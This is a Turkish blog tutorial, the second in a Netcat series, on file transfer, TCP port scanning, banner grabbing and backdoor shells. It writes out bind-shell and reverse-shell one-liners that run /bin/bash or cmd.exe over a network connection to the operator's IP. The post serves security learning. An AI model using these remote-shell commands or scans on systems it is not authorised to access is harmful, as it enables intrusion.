Netcat TCP Port Tarama, TCP Banner Grabbing, Backdoor Shell (Netcat – II)

Zinnur Yeşilyurt —  17 Ocak 2015 — 1 Comment

İkincisini yazacağımı söylediğim Netcat yazımı sonunda yazıyorum Temel sözdizimini, opsiyonlarını anlatan yazım şuradaydı: http://www.kadinyazilimci.com/netcat-i/

  • Dosya Transfer İşlemleri:

– Client’dan Listener’a dosya göndermek için:

~$ nc -l -p [Local Port] > [Gönderilen Dosya]

– [Port] üzerindeki [Hedef IP Adresi]ne [InFile] ı göndermek için:

~$ nc -w3 [Hedef IP Adresi] [Port] < [InFile]

– Listener haldeyken Client tarafından gelen dosyaları çekmek için:
( [InFile] ın gönderilmesine hazırlanılan [Local Port] dinleniyor.)

~$ nc -l -p [Local Port] < [InFile]

– [Port] üzerindeki [Hedef IP Adresi] ile bağlantı kurulup verinin [OutFile] ile çekilmesi:

(Karşıdan veri aktarma.)

~$ nc -w3 [Hedef IP Adresi] [Port] > [OutFile]

  • TCP Port Tarama:

– [Hedef IP Adresi] ndeki portlardaki iletişimi taramak için:
( [end_port] dan [start_port] a kadar tek tek bağlantı kurup tarar. )

~$ nc -v -n -z -w1 [Hedef IP Adresi] [start_port] - [end_port]
  • TCP Bayrak Yakalama (TCP Banner Grabbing):

– Linux’da IP adresi üzerinde yürütülen herhangi bir TCP işlemini yakalamak için:
( [Hedef IP Adresi] üzerinde çalışan portlarla[end_port] dan [start_port] a kadar tek tek bağlantı kurup açık porta boş bir string yollar ve dönen cevaba dair bayrağı (banner) ekrana basar. )

~$ echo "" | nc -v -n -w1 [Hedef IP Adresi] [start_port] - [end_port]
  • Backdoor Shells:

– Linux üzerinde bir backdoor shell dinlemesi:

~$ nc -l -p [Local Port] -e /bin/bash

– Windows üzerinde bir backdoor shell dinlemesi:

C: \> nc -l -p [Local Port] -e cmd.exe

– Temel Netcat Client erişiminizin olduğu alanda [Local Port] üzerinde bir shell yaratmak için:

Linux’da ters backdoor shell:

~$ nc [Sizin IP Adresiniz] [Port] -e /bin/bash

Windows’ta ters backdoor shell:

C: \> nc [Sizin IP Adresiniz] [Port] -e cmd.exe

[Sizin IP Adresiniz] deki diğer tarafın [Port] numarasındaki yerel portunuzda bir ters shell yani reverse shell yaratılmış olur. Bu reverse shell karşı tarafta temel bir Netcat Client’ın sahip olduğu yetkilerle hareket edebilecektir.
Şimdilik bu kadar. Bir dahaki Netcat yazımda “Netcat Relays On Linux” olayını anlatıp bitirmeyi planlıyorum. Umarım yakın zamanda yaparım.

Herhangi bir yanlışım varsa lütfen uyarın. (Ya da eklemek istediğiniz şeyler.)

Zinnur Yeşilyurt

Posts Twitter

Hayalindeki mesleği ve işi icra etmekte olan, mutlu ve huysuz bir penguen. Güvenlik hakkındaki her şeyi tutkuyla öğrenmek istiyor. Şu an Junior Security Consultant olarak Symturk'de çalışıyor.

Yorum yapmak için